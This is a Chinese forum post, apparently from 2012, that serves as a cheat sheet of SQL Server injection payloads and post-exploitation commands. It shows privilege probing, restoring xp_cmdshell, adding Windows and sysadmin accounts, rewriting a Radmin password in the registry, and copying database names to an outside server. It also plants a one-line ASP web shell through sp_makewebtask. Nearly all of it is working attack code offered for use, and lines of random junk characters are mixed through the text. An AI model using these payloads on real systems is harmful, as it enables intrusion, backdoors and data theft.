//看看是什么权限的
& U6 B3 c) j" i3 _and 1=(Select IS_MEMBER('db_owner'))9 d7 P% D1 ]+ A6 ^) J9 _: H) u3 v7 a
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
% i# \) q* n! t" X' r# n
# g8 M2 P) \# G% o ^//检测是否有读取某数据库的权限" a' N) ?5 J& m6 V8 M7 m3 g
and 1= (Select HAS_DBACCESS('master'))( \$ j7 X W4 |+ b
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
" o: e6 |+ n- B7 l. W% `. d1 h/ C6 h. J# A9 q
; i/ G: P0 X3 r0 d0 t6 I# |
数字类型2 I* i* A' J: |
and char(124)%2Buser%2Bchar(124)=0
' u, e0 R% ^0 s1 p4 ~; [5 A- I4 |" C- I w' K0 D
字符类型5 K9 F" @- u+ S v( v. d( p
' and char(124)%2Buser%2Bchar(124)=0 and ''='# L, [# \- c( Z( f
: S, v/ ^" O, h' U
搜索类型6 s% M, e* t. F d
' and char(124)%2Buser%2Bchar(124)=0 and '%'='; |. l( D) o( C0 F7 h4 K7 R$ J3 H
" M0 |2 [. g. k: |/ _
爆用户名! s! ~* J. g+ S
and user>0; H) Y, i. `, J3 X3 v, I
' and user>0 and ''='* O+ m4 A% E# O6 Z4 g# w4 H
+ T" P8 X5 F# T7 P* e, d
检测是否为SA权限
7 H4 a- g% u" t0 l* Hand 1=(select IS_SRVROLEMEMBER('sysadmin'));--* V( f2 W M" g8 z
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
7 F. Q6 k* p( L' n/ H8 o h) G/ K$ c3 u% B: I3 N8 C7 H
检测是不是MSSQL数据库' c+ p6 S. `* b4 l i
and exists (select * from sysobjects);--
$ y( U: ]/ u- n) h9 S# v0 T1 d" v- }6 w
检测是否支持多行
0 z# I5 b' r1 u6 p7 N5 x;declare @d int;--
' n3 {' w, V: T% R+ B0 t: S4 O2 k0 F! x3 t# c
恢复 xp_cmdshell
8 @+ s& C1 b& S) `. a: `; _;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
1 L. ]2 }* W" `2 i# x1 n7 N
* m" ?3 F3 n( |5 v9 K- M. B7 E) x- y
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')5 o' E2 v. X' e+ @, E) }! p
7 J8 m8 T! h0 B( C9 s
//-----------------------( ?: ?" r7 f4 w' a
// 执行命令
( J& K1 \, @6 G, A//-----------------------! I6 k6 O( h. Z8 n0 h1 q
首先开启沙盘模式:+ ?& C8 p& ^8 x v6 P/ {% g6 O
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',18 }2 h% v7 m" f* m9 Z9 ~
$ }* J1 j5 }0 Q+ I4 w% j然后利用jet.oledb执行系统命令
: J: p1 [4 y) ]4 F8 r3 x dselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
% z; |( g! y/ }2 u1 b, C: S4 n+ Z3 l3 v' N1 i
执行命令
* I) K9 M8 E( Q;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--, L' [0 q9 `. H( Q
0 q& O5 l9 v# i& l
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
7 b' f: M0 M2 o3 W# D4 E* j8 p6 R
判断xp_cmdshell扩展存储过程是否存在:
. F- I" e4 f% T' Q) b( o4 @% Fhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')" n/ E' V; A) b
# X! x+ _; z" y4 B写注册表4 I# S1 i/ B7 O$ C; P
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
9 V$ Q/ B0 X/ _7 Y1 U8 e, X4 t1 |& I; I, `- h" Y: F9 D3 `! c
REG_SZ$ x7 Q$ j+ Y* _
5 X# ^" \. w" S$ L" _0 X
读注册表
* P, K1 h. L, z x# q+ T. Kexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'2 n. \8 q6 |8 J
" U" \5 R+ x2 ?4 t2 e3 [: J- ?; C
读取目录内容! U) p/ ~; y( O" [
exec master..xp_dirtree 'c:\winnt\system32\',1,1
( S" v( w }3 F3 J0 r' L2 c6 |8 L( Y
! U# f9 P1 w, L5 ?6 Q7 v1 Z- N" x7 W& Z
数据库备份
2 T h4 }3 i8 x1 j; D6 ~backup database pubs to disk = 'c:\123.bak'( |4 g4 J+ U& H/ }2 z$ b
. p, H' n6 g/ O//爆出长度0 S+ \1 [/ b' r$ O7 j7 l
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--- h+ k* t* {- z+ R$ t; @1 i* q1 g
7 n8 D$ x) S! y$ j8 [( K
' _) {2 d4 ` V# Z. x2 @. O$ s( W8 ]7 t. E- {
更改sa口令方法:用sql综合利用工具连接后,执行命令:
; A- g* _' X5 `3 }0 dexec sp_password NULL,'新密码','sa'5 I; ^, ^8 y6 a4 D. H+ z2 u
0 g6 S2 E) f; e2 ^% W/ _3 v- I添加和删除一个SA权限的用户test:6 b+ k( d9 q( r
exec master.dbo.sp_addlogin test,9530772+ M6 O$ Z% g: v0 r7 ~
exec master.dbo.sp_addsrvrolemember test,sysadmin9 r% @; f) t6 X
/ ~3 K- E/ Q# g5 {0 o
删除扩展存储过过程xp_cmdshell的语句:
) O) N% _( Q6 |' N3 J$ sexec sp_dropextendedproc 'xp_cmdshell'6 s6 X6 [/ i4 x, l. g
- b) ~& w2 {9 m6 R* \
添加扩展存储过过程
8 X0 j; k4 T9 Q9 I/ ]4 |EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
' I$ r3 A) q6 u& }# f6 z6 ]& M/ T( {GRANT exec On xp_proxiedadata TO public
* o' q9 K5 {4 \$ {1 E3 n+ b/ I7 U e& H$ h J1 [
( q$ L" O3 P7 w+ ~0 k( c停掉或激活某个服务。4 f7 C0 p* n! ]' k) k3 `# B/ ]
9 F3 ]& [& I" p# D: g3 _+ ?: t
exec master..xp_servicecontrol 'stop','schedule' G' A/ B& g% x5 L) ~9 ?
exec master..xp_servicecontrol 'start','schedule'
1 X* B4 |5 C! R
' ]4 }, K9 ^& Q' x% `5 @7 Tdbo.xp_subdirs0 p* Q# f U7 A& `( ?
. ]. v8 P, K0 e3 f4 o只列某个目录下的子目录。
1 ]: b d7 R( N2 K" y- M, F3 Gxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
D l' U0 V/ l7 f
+ p5 S2 |) _; c, ]dbo.xp_makecab7 k0 B$ D5 O2 d. o9 i: N4 n
# F# H: A6 A5 U$ q0 k
将目标多个档案压缩到某个目标档案之内。
9 E3 T8 j/ D, X" _) w$ ]0 w所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。4 L% y$ Q' C, a" ?
$ f6 K+ D G, A# x
dbo.xp_makecab- O' l7 Z7 m) }1 B" A2 O
'c:\test.cab','mszip',1,& {& f! Z& p$ R
'C:\Inetpub\wwwroot\SQLInject\login.asp',
' I. h9 R ~, J2 |! O2 L'C:\Inetpub\wwwroot\SQLInject\securelogin.asp', F$ |. E1 n- s, g' h. Y
8 s6 H/ M$ t6 X% c2 k& d% Q
xp_terminate_process
1 q. L0 w: z5 r' z, l1 t% f# W+ Y5 b) H
停掉某个执行中的程序,但赋予的参数是 Process ID。/ H7 C- B5 ]3 m. ^3 Z, g6 ]
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID5 D0 {1 V" w/ X; m9 K8 o; Y
! M* a2 G9 n! E% P6 w O
xp_terminate_process 2484
" W8 y, p# ~! Q* [# M' v7 c
! q i7 j; H. n' l7 g# l: }xp_unpackcab
+ Y1 w+ y2 X2 N# P* a/ v
$ n" F) v4 T* [( _& N7 s解开压缩档。
% O& p0 L* {9 _1 o& }: g* H" ^7 Q4 g5 P# e# g
xp_unpackcab 'c:\test.cab','c:\temp',1! c$ L* l A$ @0 O- R- [
7 v, X! X: Q: Z& M4 e3 h
" [3 M' H* Y! H. T& n; ? r3 ]某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
; ~( ]6 n+ S; N7 T8 b" ], A: V, h y; e& F) {* g! U. _
create database lcx;. M0 f# H X5 `" S
Create TABLE ku(name nvarchar(256) null);" m2 G, V1 _/ k4 V ^2 z5 e; H, y
Create TABLE biao(id int NULL,name nvarchar(256) null);: B; e4 a: b& P4 n' p! v3 ?% d
* i1 L0 T4 d+ X, v//得到数据库名
( N! S- v6 O% R, Ainsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
) S1 Z* O- S# J4 J8 h( ]0 d! B% c g8 |+ G9 K) n
+ M) H1 w+ u* A3 B: q
//在Master中创建表,看看权限怎样
0 t4 \2 d# C3 X: ICreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--% E( ~8 }; |3 A/ V. O- ~' L
6 h+ T! w* E8 A# a% p! k& p用 sp_makewebtask直接在web目录里写入一句话马:
4 Y( z$ g/ e( g" P+ |4 uhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
% Q: m: i4 { `* e9 J; w
7 @$ S" [& {$ k. o, N9 ?# p//更新表内容# f' S$ ?- O/ Q( S. d% ^
Update films SET kind = 'Dramatic' Where id = 123
- v* W( d. S6 ^* n# D) v5 y
' a8 M# G4 d& h' Z//删除内容+ N2 K, K+ E7 i
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对